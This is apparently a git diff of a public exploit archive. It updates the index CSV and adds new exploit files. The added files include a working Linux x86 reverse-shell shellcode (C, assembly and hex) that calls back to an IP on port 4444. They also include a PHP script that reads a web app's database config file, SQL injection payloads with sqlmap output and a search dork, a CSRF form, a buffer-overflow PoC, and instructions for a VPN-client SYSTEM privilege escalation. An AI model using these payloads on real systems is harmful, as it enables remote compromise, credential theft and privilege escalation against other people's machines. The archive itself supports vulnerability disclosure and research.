 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
@ -35789,7 +35789,7 @@ id,file,description,date,author,platform,type,port
 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
 39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
 39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
-39574,platforms/windows/local/39574.cs,"Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
+39574,platforms/windows/local/39574.cs,"Microsoft  Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
 39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
 39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
 39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
@ -35810,7 +35810,7 @@ id,file,description,date,author,platform,type,port
 39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80
 39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
-39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
+39595,platforms/multiple/local/39595.txt,"OS X / iOS - Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80
 39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80
@ -35910,7 +35910,7 @@ id,file,description,date,author,platform,type,port
 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
 39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80
-39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
+39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
 39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443
 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80
 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
@ -35940,7 +35940,7 @@ id,file,description,date,author,platform,type,port
 39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080
 39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager <= 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0
 39740,platforms/windows/dos/39740.cpp,"Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0
-39741,platforms/osx/local/39741.txt,"Mach Race OS X Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
+39741,platforms/osx/local/39741.txt,"Mach Race OS X - Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0
 39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0
 39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80
@ -36047,7 +36047,7 @@ id,file,description,date,author,platform,type,port
 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
 39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
-39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
+39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443
 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
 39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80
@ -36068,7 +36068,7 @@ id,file,description,date,author,platform,type,port
 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
 39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
-39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
+39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
@ -36246,3 +36246,12 @@ id,file,description,date,author,platform,type,port
 40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
 40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
 40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
 40070,platforms/php/webapps/40070.txt,"WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF",2016-07-08,"Persian Hack Team",php,webapps,80
 40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
 40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
 40073,platforms/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
 40074,platforms/windows/dos/40074.txt,"Microsoft WinDbg logviewer.exe - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
 40075,platforms/lin_x86/shellcode/40075.c,"Linux x86 TCP Reverse Shellcode - 75 bytes",2016-07-08,sajith,lin_x86,shellcode,0
 40076,platforms/php/webapps/40076.php,"php Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80
 40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
--- a/platforms/lin_x86/shellcode/40075.c
+++ b/platforms/lin_x86/shellcode/40075.c
@ -0,0 +1,177 @@
 /*
 # Linux x86 TCP Reverse Shellcode (75 bytes)
 # Author: sajith
 # Tested on: i686 GNU/Linux
 # Shellcode Length: 75
 # SLAE - 750
 ------------c prog ---poc by sajith shetty----------
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 int main(void)
 {
 int sock_file_des;
 struct sockaddr_in sock_ad;
 //[1] create socket connection
 //Man page: socket(int domain, int type, int protocol);
 sock_file_des = socket(AF_INET, SOCK_STREAM, 0);
 //[2]connect back to attacker machine (ip= 192.168.227.129)
 //Man page: int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
 sock_ad.sin_family = AF_INET; 
 sock_ad.sin_port = htons(4444);
 sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
 connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
 //[3]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2
 //Man page: int dup2(int oldfd, int newfd);
 dup2(sock_file_des, 0); // stdin
 dup2(sock_file_des, 1); // stdout
 dup2(sock_file_des, 2); // stderr
 //[4]Execute shell (here we use /bin/sh) using execve call
 //[*]Man page for execve call
 //int execve(const char *filename, char *const argv[],char *const envp[]);
 execve("/bin/sh", 0, 0);
 }
 ----------------------end of c program--------------
 global _start           
 section .text
 _start:
    ;[1] create socket connection
 ;Man page: socket(int domain, int type, int protocol);
 ;sock_file_des = socket(2,1,0)
    xor edx, edx
    push 0x66           ; socket call(0x66)
    pop eax
    push edx            ; protocol = 0
    inc edx
    push edx            ; sock_stream = 1
    mov ebx, edx        ; EBX =1
    inc edx
    push edx            ; AF_INET =2
    mov ecx, esp        ; save the pointer to args in ecx register
    int 0x80            ; call socketcall()
    ; int dup2(int oldfd, int newfd);
    mov ebx, eax       ; store sock_file_des in ebx register    
    mov ecx, edx        ; counter = 2   
    loop:
        mov al, 0x3f    
        int 0x80
        dec ecx
        jns loop
 ; sock_ad.sin_family = AF_INET; 
 ;sock_ad.sin_port = htons(4444);
 ;sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
 ;connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
 xchg ebx, edx       ; before xchg edx=2 and ebx=sock_file_des and after xchg ebx=2, edx=sock_file_des
    push 0x81e3a8c0     ; sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
    push word 0x5C11    ; sock_ad.sin_port = htons(4444);
    push word bx        ; sock_ad.sin_family = AF_INET =2;
    mov ecx, esp        ; pointer to struct
    mov al, 0x66        ; socket call (0x66)
    inc ebx             ; connect (3)
    push 0x10           ; sizeof(struct sockaddr_in)
    push ecx            ; &serv_addr
    push edx            ; sock_file_des
    mov ecx, esp        ; save the pointer to args in ecx register
    int 0x80            
    mov   al, 11            ; execve system call 
    cdq ; overwriting edx with either 0 (if eax is positive)
    push  edx               ; push null
    push  0x68732f6e        ; hs/b
    push  0x69622f2f        ; ib//
    mov   ebx,esp           ; save pointer
    push  edx               ; push null
    push  ebx               ; push pointer
    mov   ecx,esp           ; save pointer
    int   0x80
 -------------obj dump------------
 rev_shell1:     file format elf32-i386
 Disassembly of section .text:
 08048060 <_start>:
 8048060: 31 d2                 xor    edx,edx
 8048062: 6a 66                 push   0x66
 8048064: 58                   pop    eax
 8048065: 52                   push   edx
 8048066: 42                   inc    edx
 8048067: 52                   push   edx
 8048068: 89 d3                 mov    ebx,edx
 804806a: 42                   inc    edx
 804806b: 52                   push   edx
 804806c: 89 e1                 mov    ecx,esp
 804806e: cd 80                 int    0x80
 8048070: 89 c3                 mov    ebx,eax
 8048072: 89 d1                 mov    ecx,edx
 08048074 <loop>:
 8048074: b0 3f                 mov    al,0x3f
 8048076: cd 80                 int    0x80
 8048078: 49                   dec    ecx
 8048079: 79 f9                 jns    8048074 <loop>
 804807b: 87 da                 xchg   edx,ebx
 804807d: 68 c0 a8 e3 81       push   0x81e3a8c0
 8048082: 66 68 11 5c           pushw  0x5c11
 8048086: 66 53                 push   bx
 8048088: 89 e1                 mov    ecx,esp
 804808a: b0 66                 mov    al,0x66
 804808c: 43                   inc    ebx
 804808d: 6a 10                 push   0x10
 804808f: 51                   push   ecx
 8048090: 52                   push   edx
 8048091: 89 e1                 mov    ecx,esp
 8048093: cd 80                 int    0x80
 8048095: b0 0b                 mov    al,0xb
 8048097: 99                   cdq    
 8048098: 52                   push   edx
 8048099: 68 6e 2f 73 68       push   0x68732f6e
 804809e: 68 2f 2f 62 69       push   0x69622f2f
 80480a3: 89 e3                 mov    ebx,esp
 80480a5: 52                   push   edx
 80480a6: 53                   push   ebx
 80480a7: 89 e1                 mov    ecx,esp
 80480a9: cd 80                 int    0x80
 -----------------------------------------------
 gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 */
 #include<stdio.h>
 #include<string.h>
 unsigned char code[] = \
 "\x31\xd2\x6a\x66\x58\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68"
 "\xc0\xa8\xe3\x81" //IP address 192.168.227.129 
 "\x66\x68"
 "\x11\x5c" // port 4444
 "\x66\x53\x89\xe1\xb0\x66\x43\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
 main()
 {
  printf("Shellcode Length:  %d\n", strlen(code));
 int (*ret)() = (int(*)())code;
 ret();
 }
--- a/platforms/php/webapps/40070.txt
+++ b/platforms/php/webapps/40070.txt
@ -0,0 +1,30 @@
 ######################
 # Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
 # Exploit Author : Persian Hack Team
 # Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
 # Category: [ Webapps ]
 # Tested on: [ Win ]
 # Version: 3.4
 # Date: 2016/07/08
 ######################
 #
 # PoC:
 # The vulnerable page is
 # /wp-content/plugins/lazy-content-slider/lzcs_admin.php
 # The Code for CSRF.html is
 <html>
 <form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
 <input name="lzcs" type="text" value="lzcs">
 <input name="lzcs_color" type="text" value="dark">
 <input type="text" name="lzcs_count" value="5">
 <input type="submit" value="go!!">
 </form>
 </html>
 #
 ######################
 # Discovered by :  Mojtaba MobhaM 
 # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi &  Milad Hacking & JOK3R And All Persian Hack Team Members
 # Homepage : http://persian-team.ir
 ######################
--- a/platforms/php/webapps/40076.php
+++ b/platforms/php/webapps/40076.php
@ -0,0 +1,35 @@
 # Exploit Title: php Real Estate Script Arbitrary File Disclosure
 # Date: 2016-07-08
 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
 # Vendor Homepage: http://www.realestatescript.eu/
 # Version: v.3
 # Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip
 Exploit : 
 <?php
 //read db config file 
 $post_data = 'tpl=../../private/config/db.php';//change read file path
 $host = "www.server.local";//change victim address
 $socket = fsockopen($host, 80, $errno, $errstr, 15);
 if(!$socket){
 echo ' error: ' . $errno . ' ' . $errstr;
 die;
 }else{
 //change [demo/en] path server
 $path = "/demo/en/";
 $http  = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1\r\n";
 $http .= "Host: $host\r\n";
 $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
 $http .= "Content-length: " . strlen($post_data) . "\r\n";
 $http .= "Connection: close\r\n\r\n";
 $http .= $post_data . "\r\n\r\n";
 fwrite($socket, $http);
 $contents = "";
 while (!feof($socket)) {
 $contents .= fgets($socket, 4096);
 }
 fclose($socket);
 $e = explode('Content-Type: text/html',$contents);
 print $e[1];
 }
 ?>
--- a/platforms/php/webapps/40078.txt
+++ b/platforms/php/webapps/40078.txt
@ -0,0 +1,55 @@
 ######################
 # Application Name : Streamo - Online Radio And Tv Streaming CMS
 # Google Dork : inurl:rjdetails.php?id=
 # Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
 # Author Contact : https://twitter.com/byn4tural
 # Vendor Homepage : http://rexbd.net/
 # Vulnerable Type : SQL Injection
 # Date : 2016-07-08
 # Tested on : Windows 10 / Mozilla Firefox
 #             Linux / Mozilla Firefox
 #             Linux / sqlmap 1.0.6.28#dev
 ###################### SQL Injection Vulnerability ######################
 # Location :
 http://localhost/[path]/menu.php
 http://localhost/[path]/programs.php
 http://localhost/[path]/rjdetails.php
 ######################
 # Vulnerable code :
 $gid = $_GET["id"];
 ######################
 # PoC Exploit:
 http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x
 # Exploit Code via sqlmap:
 sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs
 Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY
 ---
 ######################
--- a/platforms/windows/dos/40073.py
+++ b/platforms/windows/dos/40073.py
@ -0,0 +1,99 @@
 '''
 [+] Credits: HYP3RLINX
 [+] Website: hyp3rlinx.altervista.org
 [+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt
 [+] ISR: ApparitionSec
 Vendor:
 =================
 www.microsoft.com
 Product:
 =========================================
 Microsoft Process Kill Utility "kill.exe"
 File version: 6.3.9600.17298
 The Kill tool (kill.exe), a tool used to terminate a process, part of the
 WinDbg program.
 Vulnerability Type:
 ===================
 Buffer Overflow
 SEH Buffer Overflow @ about 512 bytes
 Vulnerability Details:
 =====================
 Register dump
 'SEH chain of main thread
 Address    SE handler
 001AF688   kernel32.756F489B
 001AFBD8   52525252
 42424242   *** CORRUPT ENTRY ***
 001BF81C   41414141  AAAA
 001BF820   41414141  AAAA
 001BF824   41414141  AAAA
 001BF828   41414141  AAAA
 001BF82C   41414141  AAAA
 001BF830   41414141  AAAA
 001BF834   909006EB  ë  Pointer to next SEH record
 001BF838   52525252  RRRR  SE handler  <================
 001BF83C   90909090
 001BF840   90909090
 Exploit code(s):
 ================
 Python POC.
 '''
 junk="A"*508+"RRRR"
 pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe '
 subprocess.Popen([pgm, junk], shell=False)
 '''
 Disclosure Timeline:
 ==================================
 Vendor Notification: June 24, 2016
 Vendor reply:  Will not security service
 July 8, 2016  : Public Disclosure
 Exploitation Technique:
 =======================
 Local
 Severity Level:
 ================
 Low
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no
 warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the
 information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author
 prohibits any malicious use of security related information
 or exploits by the author or elsewhere.
 HYP3RLINX
 '''
--- a/platforms/windows/dos/40074.txt
+++ b/platforms/windows/dos/40074.txt
@ -0,0 +1,230 @@
 [+] Credits: HYP3RLINX
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:
 http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt
 [+] ISR: ApparitionSec
 Vendor:
 =================
 www.microsoft.com
 Product:
 ====================
 WinDbg logviewer.exe
 LogViewer (logviewer.exe), a tool that displays the logs created, part of
 WinDbg application.
 Vulnerability Type:
 ===================
 Buffer Overflow DOS
 Vulnerability Details:
 =====================
 Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv
 files. App crash then Overwrite of MMX registers etc...
 this utility belongs to Windows Kits/8.1/Debuggers/x86
 Read Access Violation / Memory Corruption
 Win32 API Log Viewer
 6.3.9600.17298
 Windbg x86
 logviewer.exe
 Log Viewer 3.01 for x86
 (5fb8.32fc): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for
 C:\Windows\syswow64\msvcrt.dll -
 eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000
 edi=013dcd30
 eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0         nv up ei pl nz na pe
 nc
 cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
 efl=00210206
 msvcrt!memmove+0x1ee:
 754fa048 660f6f06        movdqa  xmm0,xmmword ptr [esi]
 ds:002b:005d2000=????????????????????????????????
 gs 2b
 fs 53
 es 2b
 ds 2b
 edi 136cd30
 esi 7d2000
 ebx 7d0000
 edx 0
 ecx 41
 eax 136ad30
 ebp df750
 eip 754fa048
 cs 23
 efl 210206
 esp df748
 ss 2b
 dr0 0
 dr1 0
 dr2 0
 dr3 0
 dr6 0
 dr7 0
 di cd30
 si 2000
 bx 0
 dx 0
 cx 41
 ax ad30
 bp f750
 ip a048
 fl 206
 sp f748
 bl 0
 dl 0
 cl 41
 al 30
 bh 0
 dh 0
 ch 0
 ah ad
 fpcw 27f
 fpsw 4020
 fptw ffff
 fopcode 0
 fpip 76454c1e
 fpipsel 23
 fpdp 6aec2c
 fpdpsel 2b
 st0 -1.00000000000000e+000
 st1 -1.00000000000000e+000
 st2 -1.00000000000000e+000
 st3 9.60000000000000e+001
 st4 1.08506945252884e-004
 st5 -1.00000000000000e+000
 st6 0.00000000000000e+000
 st7 0.00000000000000e+000
 mm0 0:2:2:2
 mm1 0:0:2:202
 mm2 0:1:1:1
 mm3 c000:0:0:0
 mm4 e38e:3900:0:0
 mm5 0:0:0:0
 mm6 0:0:0:0
 mm7 0:0:0:0
 mxcsr 1fa0
 xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
 xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
 xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
 xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
 xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
 xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
 xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
 xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
 iopl 0
 of 0
 df 0
 if 1
 tf 0
 sf 0
 zf 0
 af 0
 pf 1
 cf 0
 vip 0
 vif 0
 xmm0l 4141:4141:4141:4141
 xmm1l 4141:4141:4141:4141
 xmm2l 4141:4141:4141:4141
 xmm3l 4141:4141:4141:4141
 xmm4l 4141:4141:4141:4141
 xmm5l 4141:4141:4141:4141
 xmm6l 4141:4141:4141:4141
 xmm7l 4141:4141:4141:4141
 xmm0h 4141:4141:4141:4141
 xmm1h 4141:4141:4141:4141
 xmm2h 4141:4141:4141:4141
 xmm3h 4141:4141:4141:4141
 xmm4h 4141:4141:4141:4141
 xmm5h 4141:4141:4141:4141
 xmm6h 4141:4141:4141:4141
 xmm7h 4141:4141:4141:4141
 xmm0/0 41414141
 xmm0/1 41414141
 xmm0/2 41414141
 xmm0/3 41414141
 xmm1/0 41414141
 xmm1/1 41414141
 xmm1/2 41414141
 xmm1/3 41414141
 xmm2/0 41414141
 xmm2/1 41414141
 xmm2/2 41414141
 xmm2/3 41414141
 xmm3/0 41414141
 xmm3/1 41414141
 xmm3/2 41414141
 xmm3/3 41414141
 xmm4/0 41414141
 xmm4/1 41414141
 xmm4/2 41414141
 xmm4/3 41414141
 xmm5/0 41414141
 xmm5/1 41414141
 xmm5/2 41414141
 xmm5/3 41414141
 xmm6/0 41414141
 xmm6/1 41414141
 xmm6/2 41414141
 xmm6/3 41414141
 xmm7/0 41414141
 xmm7/1 41414141
 xmm7/2 41414141
 xmm7/3 41414141
 Exploit code(s):
 ===============
 1) create  .lgv file with bunch of 'A's length of 4096 overwrites XXM
 registers, ECX etc
 2) run from command line pipe the file to it to watch it crash and burn.
 ///////////////////////////////////////////////////////////////////////
 Disclosure Timeline:
 ===============================
 Vendor Notification: June 23, 2016
 Vendor acknowledged: July 1, 2016
 Vendor reply: Will not fix (stability issue)
 July 8, 2016 : Public Disclosure
 Severity Level:
 ================
 Low
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no
 warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the
 information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author
 prohibits any malicious use of security related information
 or exploits by the author or elsewhere.
 HYP3RLINX
--- a/platforms/windows/local/40071.txt
+++ b/platforms/windows/local/40071.txt
@ -0,0 +1,72 @@
 Title: Hide.Me VPN Client - EoP: User to SYSTEM
 CWE Class: CWE-276: Incorrect Default Permissions
 Date: 01/06/2016
 Vendor: eVenture
 Product: Hide.Me VPN Client
 Version: 1.2.4
 Download link: https://hide.me/en/software/windows
 Tested on: Windows 7 x86,  fully patched
 Release mode: no bugbounty program, public release
 Installer Name: Hide.me-Setup-1.2.4.exe
 MD5: e5e5e2fa2c9592660a180357c4482740
 SHA1: 4729c45d6399c759cd8f6a0c5773e08c6c57e034
 - 1. Introduction: -
 The installer automatically creates a folder named "hide.me VPN" under 
 c:\program files\ for the software. 
 No other location can be specified during installation.
 The folder has insecure permissions allowing EVERYONE the WRITE permission. 
 Users can replace binaries or plant malicious DLLs to obtain elevated privileges.
 As the software is running one executable as service under SYSTEM
 permissions an attacker could elevate from regular user to SYSTEM.
 - 2. Technical Details/PoC: -
 A. Obtain and execute the installer. 
 B. Observe there is no prompt to specify an installation location.
 C. Review permissions under the Explorer Security tab or run icacls.exe
 Example:
 C:\Program Files\hide.me VPN Everyone:(OI)(CI)(M)
                             NT SERVICE\TrustedInstaller:(I)(F)
                             NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                             NT AUTHORITY\SYSTEM:(I)(F)
                             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                             BUILTIN\Administrators:(I)(F)
                             BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                             BUILTIN\Users:(I)(RX)
                             BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                             CREATOR OWNER:(I)(OI)(CI)(IO)(F)
 Successfully processed 1 files; Failed processing 0 files
 C. A user can overwrite an executable or drop a malicious DLL to obtain code execution. 
 The highest permissions are reached by overwriting the service executable: vpnsvc.exe
 However it is running at startup and can't be stopped by a non-privileged user. 
 As we can write to the directory we can rename all of the DLL's to DLL.old
 C:\Program Files\hide.me VPN\Common.dll
 C:\Program Files\hide.me VPN\SharpRaven.dll
 C:\Program Files\hide.me VPN\ComLib.dll
 C:\Program Files\hide.me VPN\vpnlib.dll
 C:\Program Files\hide.me VPN\Newtonsoft.Json.dll
 C:\Program Files\hide.me VPN\DotRas.dll
 Once renamed, reboot the machine, log on as normal user. 
 E. Observe both application AND the system service have crashed. 
 Now replace vpnsvc.exe with a malicious copy.
 Place back all original DLLS and reboot.
 Our code will get executed under elevated permissions: SYSTEM.
 - 3. Mitigation: -
 A. set appropriate permissions on the application folder.
 - 4. Author: -
 sh4d0wman
--- a/platforms/windows/local/40072.txt
+++ b/platforms/windows/local/40072.txt
@ -0,0 +1,56 @@
